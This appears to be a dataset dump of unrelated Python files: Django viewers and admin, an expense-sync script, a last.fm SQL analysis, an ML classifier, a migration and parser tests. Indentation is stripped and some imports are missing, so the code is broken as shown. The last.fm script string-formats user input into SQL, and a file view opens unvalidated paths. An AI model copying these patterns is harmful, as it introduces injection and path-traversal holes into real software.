from django.views.generic import DetailView
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
import matplotlib
import matplotlib.pyplot
import aplpy
import astropy
from scheduler.models import Workflow
matplotlib.use('agg')
astropy.log.setLevel('ERROR')
logger = logging.getLogger(__name__)
filemagic = magic.Magic() # flags=magic.MAGIC_MIME_TYPE)
class FitsView(DetailView):
"""
Returns a rendered image. Uses the path keyword argument. Only
allows files that are somewhere in the settings.RESULTS_DIR folder.
"""
model = Workflow
def render_to_response(self, context, **kwargs):
size = int(self.request.GET.get('size', 5))
vmin = float(self.request.GET.get('vmin', 0))
vmax = float(self.request.GET.get('vmax', 0.1))
colorbar = (self.request.GET.get('colorbar', 'True').lower() != 'false')
fullpath = self.object.get_result(self.kwargs['path'])
figure = matplotlib.pyplot.figure(figsize=(size, size))
if colorbar:
subplot = [0.0, 0.0, 0.9, 1]
else:
subplot = [0.0, 0.0, 1, 1]
try:
fig = aplpy.FITSFigure(str(fullpath),
figure=figure,
subplot=subplot,
figsize=(size, size))
except IOError as e:
matplotlib.pyplot.text(0.1, 0.8, str(e))
else:
fig.show_colorscale(vmin=vmin, vmax=vmax)
if colorbar:
fig.add_colorbar()
fig.colorbar.set_font(size='xx-small')
fig.axis_labels.hide()
fig.tick_labels.hide()
fig.ticks.hide()
buf = BytesIO()
figure.canvas.print_figure(buf, format='png')
return HttpResponse(buf.getvalue(), content_type='image/png')
DirItem = namedtuple('DirItem', ['fullpath', 'name', 'type', 'size',
'modified', 'is_image'])
class SomethingView(DetailView):
"""
Will redirect to correct view according to file type.
Will render error page if file type is not understood.
"""
model = Workflow
template_name = 'viewer/unknowntype.html'
def get_context_data(self, **kwargs):
context = super(SomethingView, self).get_context_data(**kwargs)
fullpath = self.object.get_result(self.kwargs['path'])
context['type'] = filemagic.id_filename(str(fullpath))
context['path'] = self.kwargs['path']
return context
def render_to_response(self, context, **response_kwargs):
type_ = context['type']
if type_.startswith("FITS image data"):
return HttpResponseRedirect(reverse('scheduler:viewer_fits',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith("ASCII text") or \
type_.startswith('UTF-8 Unicode text'):
return HttpResponseRedirect(reverse('scheduler:viewer_text',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith('PNG image data') or \
type_.startswith('JPEG image data') or \
type_.startswith('HTML document'):
return HttpResponseRedirect(f"{self.object.public_serve()}/outdir/{self.kwargs['path']}")
return super(SomethingView, self).render_to_response(context)
class TextView(DetailView):
model = Workflow
template_name = 'viewer/textfile.html'
def get_context_data(self, **kwargs):
context = super(TextView, self).get_context_data(**kwargs)
path = self.kwargs['path']
fullpath = f"{self.object.outdir()}/{path}"
with open(fullpath, 'r') as f:
context['path'] = path
context['content'] = ''.join(f.readlines())
return context
class Js9View(DetailView):
"""
Will redirect to correct view according to file type.
Will render error page if file type is not understood.
"""
model = Workflow
template_name = 'viewer/js9.html'
def render_to_response(self, context, **response_kwargs):
response = super().render_to_response(context, **response_kwargs)
response["Access-Control-Allow-Origin"] = "js9.si.edu"
response["Access-Control-Allow-Methods"] = "GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "X-Requested-With, Content-Type"
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['path'] = f"{self.object.public_serve()}/outdir/{self.kwargs['path']}"
return context
|
nilq/baby-python
|
python
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from .models import Favorite, Subscription
User = get_user_model()
class FavoriteAdmin(admin.ModelAdmin):
model = Favorite
list_display = ('user', 'recipe')
class SubscriptionAdmin(admin.ModelAdmin):
model = Subscription
list_display = ('user', 'author')
class UserAdmin(UserAdmin):
model = User
list_display = ('email', 'username', 'is_staff', 'is_active',)
list_filter = ('email', 'username', 'is_staff', 'is_active',)
fieldsets = (
(None, {'fields': ('username', 'email', 'password')}),
('Description', {'fields': ('first_name', 'last_name')}),
('Permissions', {'fields': ('is_staff', 'is_active')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': (
'email', 'password1', 'password2', 'is_staff', 'is_active'
)
}),
)
search_fields = ('email', 'username')
ordering = ('email',)
admin.site.unregister(User)
admin.site.register(Favorite, FavoriteAdmin)
admin.site.register(Subscription, SubscriptionAdmin)
admin.site.register(User, UserAdmin)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 7 18:40:45 2019
@author: ryder
"""
#%%
import os
import pandas as pd
from pynabapi import YnabClient
import pygsheets
import datetime
import time
import re
#%%
# should create google_ledger object
with open('keys/google_expenses_sheet_key.txt', 'r') as g_sheet_id_key_txt:
GOOGLE_SHEET_ID_KEY = g_sheet_id_key_txt.readline().strip()
gc = pygsheets.authorize(service_account_file='keys/service_account_credentials.json')
sh = gc.open_by_key(GOOGLE_SHEET_ID_KEY)
#%% GOOGLE FUNCTIONS
def load_and_process_sheet(sh=sh, tab=0):
w = sh.worksheet('index', tab)
ret_df = w.get_as_df(has_header=True, start='A2')
# dollars = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Amount'] = ret_df.Amount.astype(str).str.extract(r'(\d+)')
ret_df.Amount = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Timestamp'] = pd.to_datetime(ret_df.Timestamp)
ret_df.Timestamp = pd.to_datetime(ret_df.Timestamp)
return(ret_df.reset_index(drop=True))
# return(dollars)
def load_and_process_all_sheets(sh=sh):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
str(sh.worksheets()[sheetnum])).group(0)
if curr_sheet.shape[1] != 5:
raise Exception(f'Worksheet {sheet_title} (index {sheetnum}) has the '
f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
return(all_sheets.sort_values('Timestamp', ascending=False))
#%%
def get_last_trns_date(sh=sh, payee_name = 'Ryder', format = 'datetime'):
# Get all transactions in Google Sheets
__all_trans = load_and_process_all_sheets()
__max_date = (
__all_trans
.loc[__all_trans.Payee == payee_name]['Timestamp']
.max()
)
if format == 'datetime':
return(__max_date)
elif format == 'string':
return(__max_date.strftime('%Y-%m-%d'))
#%%
def get_trans_from_ynab(sh=sh, since_date=get_last_trns_date()):
# since_date = get_last_trns_date()
with open('keys/ynab_api_key.txt', 'r') as y_api_key_txt:
YNAB_CLIENT_KEY = y_api_key_txt.readline().strip()
with open('keys/ynab_budget_id.txt', 'r') as y_bud_id_txt:
YNAB_BUDGET_ID = y_bud_id_txt.readline().strip()
yc = YnabClient(YNAB_CLIENT_KEY)
all_transactions = yc.get_transaction(budget_id=YNAB_BUDGET_ID)
column_names = ['timestamp', 'payee', 'memo', 'flag', 'amount']
listofitems = []
for item in all_transactions:
listofitems.append(str(item.date) + ',,,' +
str(item.payee_name) + ',,,' +
str(item.memo) + ',,,' +
str(item.flag_color) + ',,,' +
str(item.amount)
)
ynab_df = pd.Series(listofitems).str.split(',,,', expand=True)
ynab_df.columns = column_names
ynab_df.timestamp = pd.to_datetime(ynab_df.timestamp)
ynab_df.amount = ynab_df.amount.astype(int) / -1000
ynab_df_filter = (
ynab_df[(ynab_df.timestamp >= since_date) &
(ynab_df.flag.isin(['red', 'purple']))]
)
ret_df = pd.DataFrame(columns = ['Timestamp', 'Payee',
'Amount', 'Purpose',
'Description'])
ret_df.Timestamp = ynab_df_filter.timestamp.astype(str) + ' 00:00:00'
ret_df.Payee = 'Ryder'
ret_df.Amount = ynab_df_filter.amount.round(0).astype(int).astype(str)
# apply for us for red flags, and for you for purple flags
ret_df.Purpose = (ynab_df_filter.flag.apply(lambda x:
'for us' if x == 'red' else 'for you' if x == 'purple' else '-1'))
ret_df.Description = (
(ynab_df_filter.payee + ' - ' + ynab_df_filter.memo)
.str.replace(' - None', '')
)
return(ret_df)
def get_expenses_from_google(sh=sh, since_date='1900-01-01'):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
str(sh.worksheets()[sheetnum])).group(0)
if curr_sheet.shape[1] != 5:
raise Exception(f'Worksheet {sheet_title} (index {sheetnum}) has the '
f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
since_date_datetime = datetime.datetime.strptime(since_date, '%Y-%m-%d')
ret_expenses_from_google = (
all_sheets
.loc[all_sheets.Timestamp >= since_date_datetime]
.sort_values('Timestamp', ascending = False)
)
ret_expenses_from_google.Timestamp = (
ret_expenses_from_google.Timestamp.astype(str)
)
return(ret_expenses_from_google)
#%%
def get_new_ynab_expenses_to_upload():
# Get most recent date from Google expenses
since_date=get_last_trns_date(format='string')
# Get most recent Google shared expenses
recent_from_gs = get_expenses_from_google(since_date=since_date)
# Get my recent YNAB expenses
recent_from_ynab = get_trans_from_ynab(since_date=since_date)
# Set operation: return only those YNAB expenses NOT also in Google sheets
in_ynab_not_google = (
recent_from_ynab.merge(recent_from_gs, how = 'left', indicator = True)
.query('_merge == \'left_only\'')
.drop('_merge', 1)
)
return(in_ynab_not_google)
#%%
def append_to_expenses_sheet(expenses_to_upload):
print('')
print(expenses_to_upload)
print('')
this_month = sh.worksheet('index', 0)
while True:
decision = input('Upload to Expenses Tracker? y/n >> ')
if decision[0].lower() == 'y':
print('')
for index, row in expenses_to_upload.iterrows():
row_list = [row.Timestamp, row.Payee, row.Amount,
row.Purpose, row.Description]
this_month.append_table(row_list)
print(f'Appending ${float(row.Amount):.0f} - {row.Description} to tracker.')
print(f'\nUploaded ${expenses_to_upload.Amount.astype(float).sum():.0f} ' \
f'over {expenses_to_upload.shape[0]} transactions.')
break
elif decision[0].lower() == 'n':
print('Not entering.')
break
else:
print(f'Did not understand entry ({decision}). Try again.')
def archive_sheet_and_clear(sheet=sh):
w = load_and_process_sheet(sh, tab=0)
date_max = w.Timestamp.max().strftime('%m/%d/%Y')
date_min = w.Timestamp.min().strftime('%m/%d')
tab_title = date_min + '-' + date_max
wks = sh.worksheet('index', 0)
sh.add_worksheet(tab_title, src_worksheet=wks)
wks.clear(start='A3')
def show_spender_information(sheet=sh):
w_df = load_and_process_sheet(sheet, tab=0)
spender_list = w_df.Payee.unique()
amounts_list = []
for i, name in enumerate(spender_list):
total_shared_transactions_amt = w_df[w_df.Purpose == 'for us'].sum()
spenders_shared_transactions_amt = (
w_df[(w_df.Payee == name) & (w_df.Purpose == 'for us')]
)
print(total_shared_transactions_amt)
|
nilq/baby-python
|
python
|
name = 'omnifig'
long_name = 'omni-fig'
version = '0.6.3'
url = 'https://github.com/felixludos/omni-fig'
description = 'Universal configuration system for common execution environments'
author = 'Felix Leeb'
author_email = 'felixludos.info@gmail.com'
license = 'MIT'
readme = 'README.rst'
packages = ['omnifig']
import os
try:
with open(os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(__file__))), 'requirements.txt'), 'r') as f:
install_requires = f.readlines()
except:
install_requires = ['pyyaml', 'C3Linearize', 'omnibelt']
del os
entry_points = {'console_scripts': 'fig = omnifig.top:entry'}
|
nilq/baby-python
|
python
|
import sys
import dataset
from datetime import datetime
from dateutil.rrule import rrule, MONTHLY
from dateutil.relativedelta import relativedelta
def process(username, metric, stream_limit):
# gets all artists and their respective daily play counts
db = dataset.connect('sqlite:///last-fm.db')
total = db[username].count()
timeframe = db.query('SELECT MIN(timestamp), MAX(timestamp) FROM %s' % username).next()
mintime = datetime.fromtimestamp(timeframe['MIN(timestamp)'])
maxtime = datetime.fromtimestamp(timeframe['MAX(timestamp)'])
timeframe = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=maxtime)])
sql = 'SELECT DISTINCT {0} FROM {1} GROUP BY {0}, play_year, play_month HAVING count({0}) > {2}'.format(metric, username, stream_limit)
result = db.query(sql)
artists = []
for row in result:
artists.append(row[metric])
artists = '(%s)' % str(artists)[1:-1]
sql = 'SELECT {0}, timestamp, count({0}) FROM {1} GROUP BY {0}, play_year, play_month HAVING {0} IN {2}'.format(metric, username, artists)
result = db.query(sql)
streams = {}
for row in result:
artist = row[metric]
if artist not in streams:
streams[artist] = [0 for i in range(timeframe)]
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams[artist][elapsed - 1] == 0:
streams[artist][elapsed - 1] = row['count(%s)' % metric]
else:
streams[artist][elapsed] = row['count(%s)' % metric]
if len(sys.argv) > 2 and sys.argv[2] == '--other':
sql = 'SELECT COUNT(*) AS count, timestamp FROM {0} WHERE {1} NOT IN {2} GROUP BY play_year, play_month'.format(username, metric, artists)
result = db.query(sql)
streams['other'] = [0 for i in range(timeframe)]
for row in result:
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams['other'][elapsed - 1] == 0:
streams['other'][elapsed - 1] = row['count']
elif elapsed != len(streams):
streams['other'][elapsed] = row['count']
with open('scrobble-streamgraph/stream-data.csv', 'w') as csv:
csv.write('key,value,date\n')
for i in range(timeframe):
current = mintime + relativedelta(months=i)
for artist in streams:
try:
csv.write('%s,%s,%s\n' % (artist.replace(',', ''), streams[artist][i], '%s/01/%s' % (current.month, str(current.year)[2:])))
except UnicodeEncodeError:
pass
if __name__ == '__main__':
try:
user = sys.argv[1]
except IndexError:
print("[ERROR] No last.fm username specified.")
quit()
try:
stream_limit = sys.argv[2]
except IndexError:
print("[ERROR] No scrobble minimum specified.")
quit()
try:
int(stream_limit)
except ValueError:
print("[ERROR] Scrobble minimum must be an integer.")
quit()
metric = 'artist'
process(user, metric, stream_limit)
|
nilq/baby-python
|
python
|
import requests
from datetime import datetime
aq = []
def scrap():
url = "http://vc8006.pythonanywhere.com/api/"
response = requests.request("GET", url)
r = response.json()
for i in range(1,31):
aq.append(r[-i]['AQI'])
# print(r[-i])
# print(response.text)
print(aq)
scrap()
|
nilq/baby-python
|
python
|
import gym
from griddly import GymWrapperFactory
from griddly.RenderTools import RenderToFile
if __name__ == '__main__':
# A nice tool to save png images
file_renderer = RenderToFile()
# This is what to use if you want to use OpenAI gym environments
wrapper = GymWrapperFactory()
# There are two levels here
level = 0
wrapper.build_gym_from_yaml('GameOfLife', 'game-of-life.yaml', level=level)
# Create the Environment
env = gym.make(f'GDY-GameOfLife-v0')
observation = env.reset()
file_renderer.render(observation, f'sokoban-level-{level}.png')
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.15 on 2020-08-04 19:14
import aldryn_apphooks_config.fields
import app_data.fields
import cms.models.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import djangocms_blog.models
import djangocms_text_ckeditor.fields
import filer.fields.image
import parler.fields
import parler.models
import sortedm2m.fields
import taggit_autosuggest.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('taggit', '0003_taggeditem_add_unique_index'),
('filer', '0011_auto_20190418_0137'),
('sites', '0002_alter_domain_unique'),
migrations.swappable_dependency(settings.FILER_IMAGE_MODEL),
('cms', '0022_auto_20180620_1551'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created at')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='modified at')),
],
options={
'verbose_name': 'blog category',
'verbose_name_plural': 'blog categories',
},
bases=(djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=100, verbose_name='Type')),
('namespace', models.CharField(default=None, max_length=100, unique=True, verbose_name='Instance namespace')),
('app_data', app_data.fields.AppDataField(default='{}', editable=False)),
],
options={
'verbose_name': 'blog config',
'verbose_name_plural': 'blog configs',
},
bases=(parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='last modified')),
('date_published', models.DateTimeField(blank=True, null=True, verbose_name='published since')),
('date_published_end', models.DateTimeField(blank=True, null=True, verbose_name='published until')),
('date_featured', models.DateTimeField(blank=True, null=True, verbose_name='featured date')),
('publish', models.BooleanField(default=False, verbose_name='publish')),
('enable_comments', models.BooleanField(default=True, verbose_name='enable comments on post')),
('enable_liveblog', models.BooleanField(default=False, verbose_name='enable liveblog on post')),
('amount', models.CharField(choices=[('R50', 'R50'), ('R100', 'R100'), ('R150', 'R150'), ('R200', 'R200')], default='R50', max_length=200)),
('goal', models.CharField(choices=[('R30 000', 'R30 000'), ('R50 000', 'R50 000'), ('R100 000', 'R100 000'), ('R200 000', 'R200 000')], default='R30 000', max_length=200)),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='djangocms_blog_post_author', to=settings.AUTH_USER_MODEL, verbose_name='author')),
('categories', models.ManyToManyField(blank=True, related_name='blog_posts', to='djangocms_blog.BlogCategory', verbose_name='category')),
('content', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='post_content', slotname='post_content', to='cms.Placeholder')),
('liveblog', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='live_blog', slotname='live_blog', to='cms.Placeholder')),
('main_image', filer.fields.image.FilerImageField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_image', to=settings.FILER_IMAGE_MODEL, verbose_name='main image')),
('main_image_full', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_full', to='filer.ThumbnailOption', verbose_name='main image full')),
('main_image_thumbnail', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_thumbnail', to='filer.ThumbnailOption', verbose_name='main image thumbnail')),
('media', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='media', slotname='media', to='cms.Placeholder')),
('related', sortedm2m.fields.SortedManyToManyField(blank=True, help_text=None, to='djangocms_blog.Post', verbose_name='Related Posts')),
('sites', models.ManyToManyField(blank=True, help_text='Select sites in which to show the post. If none is set it will be visible in all the configured sites.', to='sites.Site', verbose_name='Site(s)')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', related_name='djangocms_blog_tags', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
options={
'verbose_name': 'blog article',
'verbose_name_plural': 'blog articles',
'ordering': ('-date_published', '-date_created'),
'get_latest_by': 'date_published',
},
bases=(djangocms_blog.models.KnockerModel, djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='LatestPostsPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_latestpostsplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of latests articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('categories', models.ManyToManyField(blank=True, help_text='Show only the blog articles tagged with chosen categories.', to='djangocms_blog.BlogCategory', verbose_name='filter by category')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='Show only the blog articles tagged with chosen tags.', related_name='djangocms_blog_latest_post', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='filter by tag')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='GenericBlogPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_genericblogplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.AddField(
model_name='blogcategory',
name='app_config',
field=aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config'),
),
migrations.AddField(
model_name='blogcategory',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='djangocms_blog.BlogCategory', verbose_name='parent'),
),
migrations.CreateModel(
name='AuthorEntriesPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_authorentriesplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of author articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('authors', models.ManyToManyField(limit_choices_to={'djangocms_blog_post_author__publish': True}, to=settings.AUTH_USER_MODEL, verbose_name='authors')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='PostTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('title', models.CharField(max_length=752, verbose_name='title')),
('slug', models.SlugField(allow_unicode=True, blank=True, max_length=752, verbose_name='slug')),
('subtitle', models.CharField(blank=True, default='', max_length=767, verbose_name='subtitle')),
('abstract', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='abstract')),
('meta_description', models.TextField(blank=True, default='', verbose_name='post meta description')),
('meta_keywords', models.TextField(blank=True, default='', verbose_name='post meta keywords')),
('meta_title', models.CharField(blank=True, default='', help_text='used in title tag and social sharing', max_length=2000, verbose_name='post meta title')),
('post_text', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='text')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.Post')),
],
options={
'verbose_name': 'blog article Translation',
'db_table': 'djangocms_blog_post_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfigTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('app_title', models.CharField(max_length=234, verbose_name='application title')),
('object_name', models.CharField(default='Article', max_length=234, verbose_name='object name')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogConfig')),
],
options={
'verbose_name': 'blog config Translation',
'db_table': 'djangocms_blog_blogconfig_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogCategoryTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('name', models.CharField(max_length=752, verbose_name='name')),
('slug', models.SlugField(blank=True, max_length=752, verbose_name='slug')),
('meta_description', models.TextField(blank=True, default='', verbose_name='category meta description')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogCategory')),
],
options={
'verbose_name': 'blog category Translation',
'db_table': 'djangocms_blog_blogcategory_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
]
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import ml_metrics as metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.calibration import CalibratedClassifierCV
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import log_loss
path = '../Data/'
print("read training data")
train = pd.read_csv(path+"train_tfidf.csv")
label = train['target']
trainID = train['id']
del train['id']
del train['target']
tsne = pd.read_csv(path+'tfidf_train_tsne.csv')
train = train.join(tsne)
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(train.values, label)
print("read test data")
test = pd.read_csv(path+"test_tfidf.csv")
ID = test['id']
del test['id']
tsne = pd.read_csv(path+'tfidf_test_tsne.csv')
test = test.join(tsne)
clf_probs = iso_clf.predict_proba(test.values)
sample = pd.read_csv(path+'sampleSubmission.csv')
print("writing submission data")
submission = pd.DataFrame(clf_probs, index=ID, columns=sample.columns[1:])
submission.to_csv(path+"rf_tfidf.csv",index_label='id')
# retrain
sample = pd.read_csv(path+'sampleSubmission.csv')
submission = pd.DataFrame(index=trainID, columns=sample.columns[1:])
nfold=5
skf = StratifiedKFold(n_splits=nfold)
score = np.zeros(nfold)
i=0
for tr, te in skf.split(train.values, label):
X_train, X_test, y_train, y_test = train.values[tr], train.values[te], label[tr], label[te]
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(X_train, y_train)
pred = iso_clf.predict_proba(X_test)
tmp = pd.DataFrame(pred, columns=sample.columns[1:])
submission.iloc[te] = pred
score[i]= log_loss(y_test,pred,eps=1e-15, normalize=True)
print((score[i]))
i+=1
print(("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score))))
# cv 10, 0.475277 + 0.00974157
# nfold 5: 0.48047625 + 0.0114040
# nfold 3: 0.4870385 + 0.0059006
print((log_loss(label,submission.values,eps=1e-15, normalize=True)))
submission.to_csv(path+"rf_tfidf_retrain.csv",index_label='id')
|
nilq/baby-python
|
python
|
import pytest
from mutalyzer_spdi_parser.convert import to_hgvs_internal_model, to_spdi_model
TESTS_SET = [
(
"NG_012337.3:10:C:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "C",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"deleted": [{"sequence": "C", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:1:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 1,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::T",
{
"seq_id": "NG_012337.3",
"position": 10,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:0:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 0,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
